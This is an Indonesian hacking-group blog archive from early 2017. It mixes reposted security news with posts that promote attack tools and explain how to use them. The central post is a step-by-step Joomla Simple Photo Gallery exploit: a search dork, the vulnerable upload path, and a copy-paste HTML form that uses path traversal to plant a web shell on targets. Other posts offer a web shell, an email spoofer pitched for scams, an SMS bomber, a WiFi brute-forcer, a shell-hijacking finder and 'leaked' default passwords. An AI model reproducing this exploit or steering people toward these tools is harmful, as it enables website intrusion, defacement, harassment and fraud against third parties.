Teest: tháng 1 2017

Con7ext Web Shell

Con7ext Web Shell
Download -> Download
Buatan sih RINTO -> SHUN :)
LOG ? No
Error ? Contact Yg buat lah :v
Gambar Burem ? emng dari sono :v
Salian Add FB w : M Daffa Najwan
Family Attack Cyber -> GRUP Facebook

Deface Joomla Simple Photo Gallery Shell Upload

Joomla Simple Photo Gallery Shell Upload

Go Gees o,O Tutorial nya o.O , gw harap lu langsung Paham o.O Gk Paham ?
Visit Grub kami ^_^ -> Family Attack Cyber
Dork -> inurl:com_simplephotogallery
Exploit -> /administrator/components/com_simplephotogallery/lib/uploadFile.php
Dorking dulu lah o.0 Pilih web Masukkan Exploit -> Jadi Target.com/administrator/components/com_simplephotogallery/lib/uploadFile.php
Kalo Web Vuln akan bacaan seperti ini :

20.   $fieldName = 'uploadfile';
87.      $fileTemp = $_FILES[$fieldName]['tmp_name'];
94.         $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
96.      if(! move_uploaded_file($fileTemp, $uploadPath))

Not Found ? Atau 404 ? Tinggalin deh -_-
Silahkan Copy Code ini :
<form method="POST" action="http://familyattackcyber.blogspot.com/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
    <input type="file" name="uploadfile"><br>
    <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
    <input type="submit" name="Submit" value="Enjoy Aje">
</form>
Paste abis itu save dengan .html ,jika sudah edit file tersebut lihat http://familyattackcyber.blogspot.com ganti dengan target kalian.
Jika sudah buka , abis itu pilih shell lu dan klik Enjoy Aje
Name Shell jadi Random contoh -> FAC__D31saxA.php
Shell Access -> http://target.com/FAC__(RandomString).php
Done ? Jangan lupa join grub nya cok !!! jika Gk paham mah :v
Family Attack Cyber

Default Password List – 2017 (VoIP)

Pengertian Voice over Internet Protocol (VoIP) adalah teknologi yang mampu mengirimkan data suara, video dan data yang berbentuk paket secara realtime dengan jaringan yang menggunakan Internet Protocol (IP).
Dengin ini gw akan share default daftar perankat VoIP dengan nama vendor , user & password :

Sumber ? Leaked :)

THN Deal - Bersertifikat Ethical Hacker Dengan ini Membuka Sebuah Kursus Online Training


THN Deal - Bersertifikat Ethical Hacker Dengan ini Membuka Sebuah Kursus Online Training

Hacking bukanlah proses sepele, tapi itu tidak memakan waktu terlalu lama untuk belajar. Jika Anda ingin belajar Ethical Hacking dan Penetrasi pengujian, Anda berada di tempat yang tepat.

Kami sering menerima email dari pembaca kami tentang cara belajar hacking, bagaimana menjadi seorang hacker etis, bagaimana masuk ke komputer, bagaimana untuk menembus jaringan seperti seorang profesional, bagaimana mengamankan sistem komputer dan jaringan, dan sebagainya.

Tunggu! Tunggu! Jangan mengaitkan hacker negatif, sebagai salah satu cara terbaik untuk menguji keamanan apa pun untuk pelanggaran itu, seperti hacker.

Sebuah cara untuk menjadi seorang hacker etika adalah untuk mendapatkan kursus komputer baik hacking, dan jika Anda tertarik untuk memulai menyusuri jalan keamanan cyber, Hacker Komputer Profesional Paket Sertifikasi adalah sumber daya yang besar.

Minggu ini kesepakatan unggulan dari THN Penawaran Toko membawa Anda 96% diskon pada, terlaris kursus pelatihan online yang sangat baik: Hacker Komputer Profesional Paket Sertifikasi.

Karena ada permintaan besar untuk hacker etis dan profesional teknologi, Hacker Komputer Profesional Paket Sertifikasi ini memberikan Anda semua materi dan pelatihan yang Anda harus lulus salah satu dari lima sertifikasi hacker profesional yang disebutkan di bawah:

Certified Ethical Hacker (CEH)
Certified Information Systems Security Professional (CISSP)
Certified Information Security Manager (CISM)
Certified Information Systems Auditor (CISA)
Computer Hacking Forensics Investigator (CHFI)]

Pelatihan ini 60 jam komprehensif dengan 12-Bulan akses akan memberikan pengetahuan untuk secara efektif melindungi jaringan apapun dengan mengidentifikasi kerentanan, penanganan bukti hukum dari serangan hacking, menopang pertahanan jaringan ini dengan mengekspos dan kemudian memperbaiki kelemahan keamanan, dan lebih banyak.

Hacker komputer profesional Paket Sertifikasi biasanya biaya $ 1.499, tetapi Anda bisa mendapatkan kursus utama ini hanya $ 59 pada THN Penawaran Store.
Sumber : TheHackerNews

Xmailer Free - Email Spoofer

ini cocok untuk yang suka main scam atau yang suka main rat hahaha :v , Atau jika mau di kirim ribuan gmail dalam satu target ? wkkwkwkwk ntar luber tuh gmail gmail :v. Untuk link download ada di bawah bray :v
Download is File "v
Sengaja tuh tulisan w Gedein biar lu tau downloadnya wkwkkw :v
Untuk Password ? Santai Bro Tinggal Login Grup FB kami -> Family Attack Cyber
Agan tinggal kirim ScreentShot habis download ke grub kami, nanti kami akan kasih tau :)

DAVScan , Webdav Security Scanner

DAVScan adalah cepat dan ringan WebDAV scanner yang dirancang untuk menemukan file dan folder tersembunyi pada webservers DAV diaktifkan. scanner bekerja dengan mengambil keuntungan dari terlalu istimewa / server WebDAV terkonfigurasi atau server rentan terhadap berbagai pengungkapan atau otentikasi memotong kerentanan. Pemindai mencoba untuk sidik jari server target dan kemudian laba-laba
server berdasarkan hasil dari permintaan akar PROPFIND.

Fitur :

Server sundulan fingerprinting - Jika webserver mengembalikan server header, davscan dapat mencari eksploitasi publik berdasarkan respon.
Dasar DAV scanning dengan PROPFIND - Quick scan untuk menemukan sesuatu yang mungkin terlihat dari DAV.
Unicode Tupoksi Bypass - Bekerja menggunakan GET belum menambahkan PROPFIND belum. Tidak sepenuhnya diuji sehingga periksa pekerjaan.
Pengecualian dari DoS mengeksploitasi hasil - Anda dapat mengecualikan penolakan eksploitasi layanan dari hasil searchsploit.
Pengecualian dari modul MSF dari mengeksploitasi hasil - Kustom searchsploit termasuk dalam repo untuk ini. Entah menimpa searchsploit atau cadangan yang ada dan mengganti. Fitur ini mungkin atau mungkin tidak berakhir dalam naskah searchsploit nyata.

Download Here
Thx Sudah membaca Artikel ini Semoga bermanfaat. mohon maaf jika ada salah kata :)
Family Attack Cyber , DAVScan , Webdav Security Scanner , Exploit Webdav , Webdav Auto Deface , Exploit Webdav Hmei7 , Hmei7 Tools

Adobe dan Microsoft Keaman Sangat Kritis!!! dan Sedang dalam Perbaikan

Adobe dan Microsoft pada hari Selasa setiap update keamanan dirilis untuk perangkat lunak yang diinstal pada ratusan juta perangkat. Adobe mengeluarkan update untuk Flash Player dan Acrobat / Reader. Microsoft merilis hanya empat update untuk plug sekitar 15 lubang keamanan di Windows dan perangkat lunak terkait.

Microsoft meliputi update untuk Windows, Office dan Microsoft Ujung (pengganti Redmond untuk Internet Explorer). Juga menarik adalah bahwa Januari 2017 adalah bulan lalu Microsoft berencana untuk menerbitkan buletin individu untuk setiap patch. Mulai sekarang, beberapa titik data saat ini di update individu akan disamakan menjadi "Security Update Gratis" yang diterbitkan dengan masing-masing Patch Selasa.

Perubahan ini mencerminkan pergeseran dalam cara Microsoft menyebarkan update. Tahun lalu Microsoft berhenti membuat update keamanan individu tersedia untuk pengguna rumahan, memberikan para pengguna bukan rollup keamanan bulanan tunggal yang mencakup semua update keamanan yang tersedia.

Pengguna Windows dan orang lain dengan Flash diinstal akan perlu memastikan bahwa Adobe Flash Player diperbarui (atau sesuai dipukul, lebih pada bahwa dalam sedikit). Adobe Update Flash membahas 13 kelemahan dalam plugin browser banyak-instal. patch membawa Flash untuk v. 24.0.0.194 untuk Windows, Mac dan Linux pengguna sama.

Jika Anda telah menginstal Flash, Anda harus memperbarui, berjalan pincang atau menghapus flash sesegera mungkin. Untuk melihat versi Flash browser Anda mungkin telah terinstal, periksa halaman ini. Tapi pilihan cerdas mungkin untuk parit program sekali dan untuk semua dan secara signifikan meningkatkan keamanan sistem Anda dalam proses. Sebuah program yang sangat kuat dan kereta yang mengikat dirinya ke browser, Flash merupakan target favorit dari penyerang dan malware. Untuk beberapa ide tentang bagaimana untuk berjalan pincang atau melakukan tanpa Flash (serta solusi sedikit kurang radikal) memeriksa Bulan Tanpa Adobe Flash Player.

Anda memilih untuk menjaga dan memperbarui Flash, silakan lakukan hari ini. Versi Flash terbaru harus tersedia dari halaman rumah Flash. pengguna Windows yang menjelajah Web dengan apa pun selain Internet Explorer mungkin perlu untuk menerapkan patch ini dua kali, sekali dengan IE dan lagi menggunakan browser alternatif (Firefox, Opera, misalnya).

Chrome dan IE harus auto-install versi terbaru Flash pada browser restart (pengguna mungkin perlu memeriksa secara manual untuk update dan / atau restart browser untuk mendapatkan versi terbaru Flash). versi saya Chrome mengatakan itu yang terbaru (55.0.2883.87) tapi Chrome Pers blog mengatakan stabil versi terbaru - 55.0.2883.105 mencakup perbaikan Flash (antara perbaikan keamanan lainnya untuk Chrome), yang belum ditawarkan. Situs Web Adobe memberitahu saya versi Flash saya adalah 24.0.0.186 (bukan yang terbaru).

Jika ragu dengan Chrome, klik vertikal tiga titik ikon di sebelah kanan bar URL, pilih "Help," lalu "Tentang Chrome": Jika ada pembaruan yang tersedia, Chrome harus menginstalnya kemudian. Dalam kedua kasus, pastikan untuk me-restart browser setelah menginstal update (jika tidak melakukannya untuk Anda).Seperti biasa, jika Anda mengalami masalah menerapkan pembaruan ini, jangan ragu untuk meninggalkan catatan tentang masalah di komentar di bawah ini. Anda bisa membantu orang lain yang sedang mengalami masalah yang sama!.
Sumber : Kreabon Security

Cara mendapatkan Dollar dengan mudah!!! (NoScam)

Tips 100% Aman Mendapatkan uang Dengan Cepat !

Pastinya kalian butuh Uang kan ? ya sama kaya saya hahahhaha :) Ok mari kita lanjut :)
langsung saja klik Link ini -> Click Here

Silahkan Daftar Dahulu
Jika Sudah nanti akan ada konfirmasi gmail di gmail kalian
Nah abis itu untuk mendapatkan uang ? kalian selesai kan misi yang akan di berikan atau Share Refferral kalian :)
Untuk penukaran silahkan Klik Prize

dalam ini kalian bisa pilih Hadiah Gadgets , Electronik dan Gift Card
Untuk mendapatkan uang di paypal kalian klik Gift Card dan pilih paypal kalian boleh pilih mana aja
terimah kasih sudah baca :)
Cara mendapatkan Dollar dengan mudah!!! (NoScam)

WIBR - Wifi Brute Forcing / Dictionary Attacks (Android)

WIBR adalah sebuah aplikasi untuk pengguna berakar untuk melakukan kamus atau bruteforce serangan pada jaringan wifi di daerah mereka. Anda harus dekat router sehingga Anda tidak kehilangan koneksi dan itu lambat karena android.

Terimah kasih semua sudah membaca postingan ini :). jika ini bermanfaat tolong di share postingan ini
Click To Download
WIBR - Wifi Brute Forcing / Dictionary Attacks , Brute Force Wifi Attack , Hack Wifi is Androis , Hack wifi di android.

SMS Bomber Gratis !!! + 100+ PROVIDERS

Download Here

Khusus Yang suka untuk Ngebomm Sih ripper :v atau gimana main ngerjain temen atau gimana atuh itu seterah lu kalo gw mah share aja tools ini ok :) thx sudah baca :)
Instagram Kami
SMS Bomber Gratis !!! + 100+ PROVIDERS

Ransomware sleazeballs Menargetkan sekolah UK

Cybercrooks menargetkan sekolah UK, menuntut pembayaran hingga £ 8.000 untuk membuka data yang mereka telah dienkripsi dengan malware.

Aksi Penipuan memperingatkan bahwa penipu adalah sekolah dingin-menelepon mengaku dari Departemen Pendidikan dan meminta alamat email para guru kepala '. Penjahat kemudian mengirim email jebakan dengan lampiran zip menular seharusnya berisi informasi sensitif.

Pada kenyataannya, file-file ini membawa berkas-enkripsi ransomware. Aksi Penipuan mendesak lembaga pendidikan untuk waspada.

Andrew Stuart, managing director backup dan pemulihan bencana penjual Datto, berkomentar: "hacker jahat melihat ransomware sebagai sebuah bisnis, dan telah dikenal untuk mengeksploitasi rumah sakit dan bahkan amal, sehingga sekolah yang selalu mungkin target.

"Sangat penting bahwa sekolah meninjau prosedur backup data mereka untuk memastikan bahwa mereka tidak hanya memiliki salinan dari semua data penting, tetapi dapat memulihkan data mereka lancar dalam hal insiden ransomware.
Sumber : The Register

Bug Untuk IOS Mencapai $ 500.000 untuk Exploits

Tampaknya tahun ini bug semakin benar-benar serius, terutama di pasar sekunder melibatkan mengeksploitasi perusahaan perdagangan, tidak langsung ke produsen software atau pemilik.

$ 500.000 tidak bodoh perubahan dan akan menjadi tahun yang baik untuk tim keamanan kecil, terutama yang tinggal di suatu tempat dengan mata uang lemah. Bahkan untuk seorang peneliti keamanan solo di AS atau Eropa itu segepok uang tunai yang serius.

Chrome tidak terlalu jauh di belakang baik dengan $ 150.000 pembayaran yang tersedia.

Pekan lalu Apple membuat pintu masuk terlambat ke pasar bug karunia, mengumumkan penghargaan atas $ 200.000 untuk cacat besar dalam iOS, tetapi Cook & Co telah secara komprehensif dlm.

     Pada hari Selasa, mengeksploitasi perusahaan perdagangan Exodus Intelligence mengatakan bersedia membayar $ 500.000 untuk cacat besar dalam iOS 9.3 dan di atas - dan mengeksploitasi untuk menggunakannya. Para peneliti baik dapat mengambil lump sum atau menerima jumlah yang lebih kecil dan pembayaran kuartalan sampai mengeksploitasi ditemukan, yang pendiri perusahaan kepada The Reg bisa menambahkan hingga lebih.

     "Mayoritas klien kami adalah vendor defensif, penguji penetrasi, dan merah tim / biru," kata Logan Brown, presiden Exodus.

     Apel eksploitasi mendapatkan penghargaan tertinggi, mencerminkan kelangkaan mereka. Microsoft dan Google program bug bounty juga perlu sampai imbalan mereka untuk mencocokkan harga Exodus ini.

     Sehari nol di Google Chrome akan mendapatkan maksimal $ 150.000, 50 persen lebih dari uang pembayaran tertinggi Chocolate Factory.

Sepertinya perangkat Apple masih merupakan hal yang panas untuk pergi setelah dengan kurangnya serius eksploitasi tersedia untuk versi iOS baru. Bahkan Apel sendiri menawarkan $ 200.000

Untuk mendapatkan pembayaran maksimum dari Apple Anda harus memberikan cacat dalam firmware boot aman yang jadi jengkel FBI, sementara celah yang dapat mengekstrak data rahasia yang dilindungi oleh telepon atau prosesor kantong aman tablet (September) akan menghasilkan hadiah sampai $ 100.000.

Sementara itu, menemukan cacat serius di browser Ujung Redmond ini bernilai $ 125.000 Exodus, jauh melebihi $ 500 dan $ 1.500 saat ini ditawarkan oleh Microsoft. Ada juga $ 75.000 untuk diperebutkan jika Anda dapat menumbangkan hak lokal di Windows 10 dan menunjukkan bagaimana hal itu dilakukan.

Keluaran mengatakan itu senang untuk membayar karunia ini di cek, transfer kawat, Western Union, atau Bitcoin.

Namun demikian, ini adalah persis jenis perang penawaran yang perusahaan perangkat lunak besar tidak ingin melihat ketika mereka mulai melakukan karunia bug. Awalnya harga untuk kerentanan yang ditetapkan rendah, tetapi meningkat untuk memenuhi harga pasar. Sekarang peneliti keamanan mampu membuat kehidupan yang layak berlatih kerajinan mereka.

Seperti yang Anda lihat, Exodus menawarkan banyak sekali lebih dari para pedagang sendiri dengan cacat di Ujung pergi untuk $ 125.000 dengan Microsoft hanya menawarkan sangat sedikit $ 1.500.

Ini bukan apa yang vendor perangkat lunak ingin, tapi itu apa yang masyarakat perlu untuk mengekspos kelemahan serius - mereka harus batuk dan harga pasar menangkap meskipun. Jika tidak eksploitasi mungkin berakhir dengan pemerintah yang mungkin tidak harus memiliki mereka.

INURLBR - Advanced Alat Search Engine

INURLBR adalah berdasarkan alat mesin pencari canggih PHP untuk profesional keamanan, mendukung 24 mesin pencari dan 6 web atau khusus dalam pilihan. Sangat berguna untuk tahap pengumpulan informasi dari uji penetrasi atau penilaian kerentanan.

Alat ini berfungsi dalam banyak cara yang memungkinkan Anda untuk memanfaatkan kekuatan apa yang sudah diindeks oleh mesin pencari dan menganalisis target Anda untuk eksploitasi potensi, capture E-mail dan URL dengan validasi internal kustom untuk setiap target / URL ditemukan.

Juga mendukung perintah eksternal untuk eksploitasi, jadi jika Anda scan / pencari menemukan potensi divalidasi kerentanan SQL Injection, Anda bisa memiliki INURLBR langsung meluncurkan sqlmap atau alat pilihan Anda.

Features :

Generate IP ranges or random_ip and analyse the targets.
Customization of HTTP-HEADER, USER-AGET, URL-REFERENCE.
Execute external commands to exploit certain targets.
Generate random dorks or set dorks file.
Option to set proxy manually or from a file list.
Supports both SOCKS and HTTP proxies
Set time for proxy change when using random.
Supports TOR to randomise IP.
Debug processed URLs & HTTP requests.
Can send vulnerable URLs to an IRC chat room.
Support for GET / POST => SQLI, LFI, LFD injection exploits.
Filter and validate based on regexp.
Extraction of e-mail addresses and URLs.
Validation using HTTP response codes.
Search pages based on strings file.
Exploits commands manager.
Paging limiter on search engines.
Beep sound when a vulnerability is found.
Use text file as a data source for URLs to test.
Find personalized strings in return values of the tests.
Checks and validates for ShellShock
File validation for the WordPress config file – wp-config.php.
Can execute a sub-process for validation.
Validate syntax errors for databases and programming.
Data encryption as native parameter.
Random Google host.
Scan port.

Mesin Mencari yang Support :

Google / (CSE) generic random / API
Bing
Yahoo! BR
Ask
HAO123 Br
Google (API)
Lycos
UOL Br
Yahoo! US
Sapo
Dmoz
Gigablast
Never
Baidu BR
Andex
Zoo
Hotbot
Zhongsou
Hksearch
Ezilion
Sogou
DuckDuckGo
Boorow
Google (CSE) generic random

Special :

Tor Find
Elephant
Torsearch
Wikileaks
OTN
Shodan

Errors Yang di Check untuk :

Java Infinitydb
LFI
Zimbra mail
Zend framework
MariaDB
MySQL
Jbossweb
Microsoft
ODBC
PostgreSQL
PHP
WordPress
Web Shell
JDBC
ASP
Oracle
DB2
CFM
LUA

Jika kalian ingin Mendownload Silahkan Klik Tombol -> Here Download !
Terimah kasih sudah membaca tolong di share postingan ini jika bermanfaat buat kalian :D

(Update) Mencari Celah Admin Finder V3

Hallo :)
sekarang jarang on, saat tidak on sempat" update nich aplikasi :)
beberapa udh pasang wordlistnya sampat 101 wordlist yaitu setengah indo dan luar negeri :v
langsung aja kita comot :)
Download Here!!!

(Update) Mencari Celah Admin Finder V3

0Day Exploit Shell Finder

Tools ini berfungsi jika lo Gk tau tempat shell lo dan ini cocok untuk tikung shell orang :D what ? yes ini masih uji coba nanti gw fix yang error :D.

Klik di sini untuk Mendownload :D

Thx You Sudah membaca Tools ini :D

Teest